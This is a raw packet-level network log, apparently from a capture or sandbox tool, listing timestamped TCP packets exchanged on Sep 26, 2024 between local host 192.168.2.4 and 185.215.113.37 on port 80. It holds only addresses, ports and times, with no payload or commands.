Sep 26, 2024 18:27:12.658407927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658415079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658425093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658446074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658462048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658478022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658498049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658509970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658533096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658541918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658572912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658572912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658596039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658606052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658617973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658638954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658654928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658672094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658688068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658704042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658725977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658735991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658754110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658768892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658782005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658798933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658817053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658830881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658859015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658863068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658876896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658895016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658924103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658927917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.658947945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.658982992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663189888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663223028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663254023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663273096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663285971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663312912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663321018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663358927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663362026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663408995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663414001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663444996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663467884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663475990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663497925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663507938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663521051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663542032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663562059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663574934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.663593054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.663623095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.785242081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.785263062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.785274982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.785284996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.785295010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.785305023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.785311937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.785403013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.785465002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786168098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786178112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786187887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786204100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786215067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786223888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786232948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786237001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786243916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786256075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786266088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786269903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786297083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786320925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786324978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786339045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786351919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786369085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786370993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786379099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786384106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786392927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786393881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786401033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786406040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786416054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786425114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786436081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786437035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786447048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786457062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786467075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786473989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786477089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786489010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786499023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786508083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786509037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786525011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.786533117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786562920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.786573887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787364006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787374973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787390947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787400961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787405968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787421942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787424088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787436008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787446022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787456036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787466049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787471056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787476063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787477016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787482023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787492990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787503004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787504911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787513971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787523031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787524939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787537098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787547112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787556887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787566900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787576914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787586927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787596941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.787604094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787630081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787630081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787630081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.787652016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.788706064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788717031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788759947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.788886070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788897991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788902998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788908958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788918018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788934946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788944960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788954973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788958073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.788965940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788976908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788983107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.788988113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.788999081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789009094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789011002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.789020061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789030075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789040089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789042950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.789053917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789063931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789069891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.789074898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789086103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789094925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.789094925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.789118052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.789144993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790313959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790323973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790334940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790350914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790359974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790365934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790370941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790381908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790383101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790394068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790405035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790415049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790424109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790431023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790433884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790445089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790456057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790461063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790471077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790472984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790481091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790492058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790502071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790510893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790518045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790522099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790534973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790544987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790555000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790555954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790565968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.790577888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790606976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.790628910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.792424917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.792437077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.792447090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.792486906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.792526007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.876902103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.876970053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.877003908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.877016068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.877049923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.877082109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.877262115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.877306938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.877338886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.877352953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.877383947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.877388000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.877412081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.877418041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.877435923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.877470016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879036903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879086971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879097939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879126072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879136086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879163980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879188061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879196882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879228115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879252911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879252911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879292965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879309893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879326105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879348040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879358053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879374027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879401922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879410028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879466057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879489899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879497051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879508972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879529953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.879550934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.879576921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881006002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881038904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881072998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881072998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881093979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881107092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881122112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881139040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881158113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881171942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881181955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881206036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881218910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881238937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881253004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881278992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.881299973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.881341934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902280092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902299881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902312994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902343035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902364016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902448893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902460098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902470112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902481079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902498960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902535915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902712107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902721882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902769089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902798891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902808905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902818918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902828932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902838945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902842999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902856112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902865887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902873039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902877092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.902896881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.902947903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.903395891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903405905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903414965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903419971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903425932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903430939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903439999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903448105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.903456926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903467894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903477907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903477907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.903485060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903490067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903517962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.903590918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903601885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903610945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903620958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903621912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.903631926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903637886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.903645039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903655052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903666019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903667927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.903676987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.903702974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.903724909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:12.905132055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905167103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905183077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905196905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:12.905201912 CEST	49730	80	192.168.2.4	185.215.113.37
